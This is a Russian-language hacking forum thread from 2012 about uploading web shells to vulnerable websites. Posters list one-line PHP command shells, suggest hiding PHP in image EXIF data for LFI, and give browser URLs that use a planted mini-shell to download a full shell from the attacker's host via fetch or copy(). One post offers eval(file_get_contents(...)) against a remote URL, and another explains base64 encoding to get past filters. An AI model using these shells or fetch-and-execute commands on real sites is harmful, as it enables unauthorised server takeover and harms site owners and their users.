Авторские статьи Не стандартные способы заливки шелла

Ereee · 11 Mar 2012

Alex2103,
lol. Как .jpg будет выполнятся как .php, если нет .htaccess-а? Думаю ТС сказал про exif, чтобы помочь при LFI.

Alex2103 · 11 Mar 2012

ребят подскажите я обхожу фильтры, у меня картинка закачивается
всё ок! коменты остаются

ну как мне понять работает ли эта уязвимость на этом сайте
вдруг админ заблочил

то есть, я имею ввиду, и так и сяк пробовал не получается ((

Osstudio · 11 Mar 2012

Га-Ноцри said:

Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.

И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:

PHP:

<?system($_GET[cmd])?>

PHP:

<?eval($_GET[cmd])?>

PHP:

<?passthru($_GET[cmd])?>

PHP:

<?eval($_REQUEST[cmd])?>

PHP:

<?passthru($_REQUEST[cmd])?>

PHP:

<?system($_REQUEST[cmd])?>

PHP:

<?assert($_GET[cmd])?>

Например мы залили <?system($_GET[cmd])?>, тогда

PHP:

http://уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;

// Узнаем "качалку", если fetch, то

PHP:

http://уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php

// Заливаем полноценный шелл

Если мы залили <?assert($_GET[cmd])?>, то

PHP:

http://уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");

Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".

Как-то так, в общем.
Click to expand...

ок, подправим

BLurpi^_^ · 17 Mar 2012

Га-Ноцри said:

Вы немножко вводите автора вопроса в заблуждение. Ведь если сайт не подвержен уязвимости типа LFI, то он просто не сможет проинклудить свою картинку с вредоносным PHP-кодом, который должен интерпретироваться, пусть даже если и повезло обойти фильтры.

И, да, к автору статьи огромная просьба. На своем опыте я понял, что многие могут столкнуться с такой проблемой - когда так скажем, мини-шелл, уже залит, а что делать дальше, чтобы залить полноценный, например тот же wso, не понятно. Отличным дополнением к статье было бы подробно описать синтаксис вводимого кода в строке браузера, когда уже залиты шеллы вида:

PHP:

<?system($_GET[cmd])?>

PHP:

<?eval($_GET[cmd])?>

PHP:

<?passthru($_GET[cmd])?>

PHP:

<?eval($_REQUEST[cmd])?>

PHP:

<?passthru($_REQUEST[cmd])?>

PHP:

<?system($_REQUEST[cmd])?>

PHP:

<?assert($_GET[cmd])?>

Например мы залили <?system($_GET[cmd])?>, тогда

PHP:

http://уязвимый_сайт.ru/shell.php?cmd=which get;which wget;which lynx;which curl;which fetch;

// Узнаем "качалку", если fetch, то

PHP:

http://уязвимый_сайт.ru/shell.php?1=fetch http://мой хост/шелл.txt; mv шелл.txt 2.php

// Заливаем полноценный шелл

Если мы залили <?assert($_GET[cmd])?>, то

PHP:

http://уязвимый_сайт.ru/shell.php?cmd=copy("http://путь_до_шелла_на_хосте.ru/shell.txt","./shell.php");

Самое главное, сделать упор на конкретно вводимом коде в адресной строке браузера. Ведь не все не дружат с Гуглом и справочником по PHP-функциям. Если ТС понял, что я от него хочу, то думаю его статья станет настоящим шедевром и пошаговым пособием для начинающих "в картинках".

Как-то так, в общем.
Click to expand...

зачем это, если можно тупо ?e=eval(file_get_contents('http://updateyou.ru/1.txt'));

Osstudio · 24 Mar 2012

Ну, это почти всегда срабатывает =)

sasha.seven · 25 Mar 2012

Полезная инфа благодарю, пару методов уже знал но всё равно добавилось знаний

Osstudio · 25 Mar 2012

Честно говоря, есть ещё пару методов, но их раскрывать не стоит

winstrool · 25 Mar 2012

Мы сдесь делимся общеми методами, чтоб была пища для мозгов что и как можно сделать и что из этого всего общего приготовить свое уникальное, а не своими уникальнастями)

P.S: OxoTnik - не выложим

Ins3t · 25 Mar 2012

хватит выпендриваться. у вас просто нету ничего такого.

GrandMaster · 26 Mar 2012

Охотник такой клоун, ой я не могу

P.s да покарает меня модер за флуд и оффтоп

twost · 26 Mar 2012

Отличная статья! Молодцы ребята.

У меня вопрос, как у начинающего хакера - а можете выложить теперь стандартные способы заливки шелла? (надеюсь не ошибся в терминологии).

Заранее спасибо.

Ereee · 26 Mar 2012

twost said:

Отличная статья! Молодцы ребята.

У меня вопрос, как у начинающего хакера - а можете выложить теперь стандартные способы заливки шелла? (надеюсь не ошибся в терминологии).

Заранее спасибо.
Click to expand...

TC ошибся. Он случайно "не" в название добавил. Извиняйте!

P.S. Троллинг не удался у тебя

Osstudio · 26 Mar 2012

Ereee said:

TC ошибся. Он случайно "не" в название добавил. Извиняйте!

P.S. Троллинг не удался у тебя
Click to expand...

Типо того

Вообще, стандартный метод, это тупо залить PHP, видимо =) А всё остальное - это обходы, т.е не стандартно))

GrandMaster · 26 Mar 2012

Osstudio said:

Вообще, стандартный метод, это тупо залить PHP, видимо =)
Click to expand...

На свой сайт через фтп?

Osstudio · 26 Mar 2012

GrandMaster said:

На свой сайт через фтп?
Click to expand...

Ты нах*я приват спалил?

Ins3t said:

хватит выпендриваться. у вас просто нету ничего такого.
Click to expand...

Да вообще-то есть пару методов, которые раскрывать не стоит)

Osstudio · 4 Apr 2012

Добавил про то, что если нельзя юзать кавычки, то можно использовать base64, расписал как можно более для новичков.

Twoster · 4 Apr 2012

А также, можно использовать Base64.
- Но ведь он оканчивается на "==" ??
спросите вы, но вот и нет, зашифруйте свой PHP код, и если на конце оказалось "==", то добавьте в ваш код "//" в коцен пхп кода, это будет комментарий, и т.к исходный файл будет на 2 символа больше, то "==" отпадает, если у вас показывает "=" (одно равно на конце), то просто тоже добавьте какой-либо символ в код, например увеличьте название переменной.
Затем этот код можно использовать без кавычек, а просто в скобках... вот так.
Click to expand...

multiple facepalm.

Что это?! Зачем писать в файл дополнительные символы?!
Мой мозг...

Osstudio · 4 Apr 2012

Expl0ited said:

до сих пор не понимаю кто позволяет этой теме жить
Click to expand...

я

Twoster said:

multiple facepalm.

Что это?! Зачем писать в файл дополнительные символы?!
Мой мозг...
Click to expand...

Потому-что без кавычек в переменную нельзя занести спец символы, только если их какой либо глобальной переменной. А зато мы можем зашифровать в base64, но бывает так, что он оканчивается на ==, тогда можно добавить два символа в код, и эти знаки отпадают... т.к там идёт 0 равно, 1 равно, 2 равно, 0 равно... и т.д

Twoster · 4 Apr 2012

Osstudio said:

Потому-что без кавычек в переменную нельзя занести спец символы, только если их какой либо глобальной переменной. А зато мы можем зашифровать в base64, но бывает так, что он оканчивается на ==, тогда можно добавить два символа в код, и эти знаки отпадают... т.к там идёт 0 равно, 1 равно, 2 равно, 0 равно... и т.д
Click to expand...

Rest in Peace, achat!

|qbz| · 4 Apr 2012

Я думаю осстудио нужно как и суицид назначить модератором какого-нибудь раздела, ну, например, Уязвимости или Безопасность и продвинуть в ЛОА. А я, пожалуй, скоро свалю из этого местечка, что-то надоело мне тут.

Авторские статьи Не стандартные способы заливки шелла

Ereee Elder - Старейшина

Alex2103 New Member

Osstudio Banned

BLurpi^_^ Banned

Osstudio Banned

sasha.seven Banned

Osstudio Banned

winstrool MasterBlind

Ins3t Харьковчанин

GrandMaster Active Member

twost Member

Ereee Elder - Старейшина

Osstudio Banned

GrandMaster Active Member

Osstudio Banned

Osstudio Banned

Twoster Members of Antichat

Osstudio Banned

Twoster Members of Antichat

|qbz| Banned

Useful Searches

Авторские статьи Не стандартные способы заливки шелла

Ereee Elder - Старейшина

Alex2103 New Member

Osstudio Banned

BLurpi^_^ Banned

Osstudio Banned

sasha.seven Banned

Osstudio Banned

winstrool ~~*MasterBlind*~~

Ins3t Харьковчанин

GrandMaster Active Member

twost Member

Ereee Elder - Старейшина

Osstudio Banned

GrandMaster Active Member

Osstudio Banned

Osstudio Banned

Twoster Members of Antichat

Osstudio Banned

Twoster Members of Antichat

|qbz| Banned

winstrool MasterBlind